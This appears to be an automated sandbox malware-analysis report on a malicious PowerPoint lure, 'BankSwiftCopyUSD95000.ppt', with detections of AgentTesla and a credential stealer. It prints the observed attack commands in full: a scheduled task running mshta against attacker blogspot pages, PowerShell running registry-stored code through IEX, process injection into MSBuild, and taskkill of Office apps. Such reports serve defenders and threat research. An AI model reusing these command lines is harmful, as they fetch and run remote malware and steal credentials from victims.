Source: C:\Windows\System32\mshta.exe TID: 1988	Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1900	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 3036	Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2560	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2744	Thread sleep time: -300000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 12_2_01D8096A GetSystemInfo,

12_2_01D8096A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: mshta.exe, 00000011.00000002.2222610577.00000000005BA000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\mshta.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)

Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: unknown base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html

Uses taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')			Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match	File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

Yara detected Credential Stealer

Source: Yara match

File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match	File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

ID:	339086
Product:	CloudBasic
Start time:	13:42:35
Start date:	13.01.2021
Sample:	BankSwiftCopyUSD95000.ppt
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7f0b415d0b7a76530b2f510a910811e5
SHA1:	480594ad26c91dd9d719c80334285375540dc83e
SHA256:	8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Filetype:	Microsoft PowerPoint document (31509/1) 79.74%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\281434096-static_pages[1].css	ASCII text, with very long lines	B3E61DF6E41A93485461F77324FCD93E	46EFB1044FF1CB854E02BCB49ADA1D501CE0AFF4	0FC52EF116F03FD95F9857856F1E2CBDFA2CACC398E066DB0D8D5481739BC2D7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\3101730221-analytics_autotrack[1].js	ASCII text, with very long lines	094CE5DCACCF632457AE9FBF4F325399	87E144F51C7BEE2D624709C8F596037A92D06E66	21CC4DC6C3C01B84C808004173F42E3ED1B4F09551A10D69B4CEC7394A1590E6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\376796862-ieretrofit[1].js	ASCII text, with very long lines	948E0FDD7E43A410514074A85F8F830F	8539D93757C0B546863C42C2682696182F951476	59E1456632564F9C0044D7AC65C979AF6D7BF9548621F881E5B25659612EFF72
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\84067855-widgets[1].js	ASCII text, with very long lines	63642B890AD1CBD4C33DF076775147A8	501936F025C1D9F1EA5401E9743632C6C1284A71	A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\body_gradient_tile_light[1].png	PNG image data, 10 x 10, 1-bit colormap, non-interlaced	3B2A20D5B0BA4CA0C5DD90865AD6B9C4	A90928A16D11D21E112B45B60990A9D7D19CC1D5	0FDCB4746995F0D5240E5EC11370CB950722A894F3CFF4118AA68CCC92010EDD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[1].js	ASCII text	A705132A2174F88E196EC3610D68FAA8	3BAD57A48D973A678FEC600D45933010F6EDC659	068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[2].js	ASCII text	A705132A2174F88E196EC3610D68FAA8	3BAD57A48D973A678FEC600D45933010F6EDC659	068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\error[1]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	16AA7C3BEBF9C1B84C9EE07666E3207F	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gradients_light[1].png	PNG image data, 20 x 1100, 8-bit/color RGBA, non-interlaced	4F7DE2E6AFEFB125B1F14FA5CDA610EE	57A145F234B504A73F9D55CF39F2231A04719456	ECB30886406E3F776FF7BC3834DE849944471E626FF148BED2FA389D02866044
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3858658042-comment_from_post_iframe[1].js	ASCII text, with very long lines	EE77AB1C7CA023A501E4DA28CCC2915F	F309FB6B570041EE11C830ABA4DD58D586D193B6	A09131F2885086EB3DEA6A379C43E58C88E683B99FB7CF9CEFDE399DFD68D0FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\blogin[1].htm	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)	2F0617DDC36B03F4723AD04D4891F74E	4A0ED082B77CA3E70DE11FC42AED497A7C067E94	E036CAB59948C4704421AAA2090E662FFAD53D794FB9C84206FFFA7208591993
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[1].js	ASCII text	A705132A2174F88E196EC3610D68FAA8	3BAD57A48D973A678FEC600D45933010F6EDC659	068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[2].js	ASCII text	A705132A2174F88E196EC3610D68FAA8	3BAD57A48D973A678FEC600D45933010F6EDC659	068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\css[1].css	ASCII text	C141D007243B3488466496ED83F13B2F	F184CE8D5074D7B510E2A529AECCF0B3DB0F8EBE	D9427036A7A10029E9B0454939E9BB5095D217AFCFC8EF43E2B49F870B0562EA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dbgghasdnasdjasgdakgsdhv[1].htm	HTML document, ASCII text	D86CDDDEC21570C2E24C90E1E4ACE774	6B9A49121E9D26DAD7EB0EB9BF974109A46D944C	01458D44E9CEAFE97FB50BAC49BB2C3BFA126B6A7F67CD7E2B536487CD41C338
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[1]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	16AA7C3BEBF9C1B84C9EE07666E3207F	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[2]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	16AA7C3BEBF9C1B84C9EE07666E3207F	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ghostbackup13[1].htm	HTML document, ASCII text, with very long lines	48245C14CB5FABC9DE13624D15960409	43C4EFD1E023A67E41CB247144EEFD77845720DB	97E1F2201FE9E16C0B60857431C3D90377DA98C829C6E7A3A3F0F8F760DD7ED8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\st2[1].htm	HTML document, ASCII text, with very long lines	4471AED27F6F7476F83FF74C5AA21822	11F39F288AF421327BBC9E8E573503B1A22905CE	F99248B36DEDF11DCB731D26CACE0C77C3B6E3FA630D78F84D13BC88B8217333
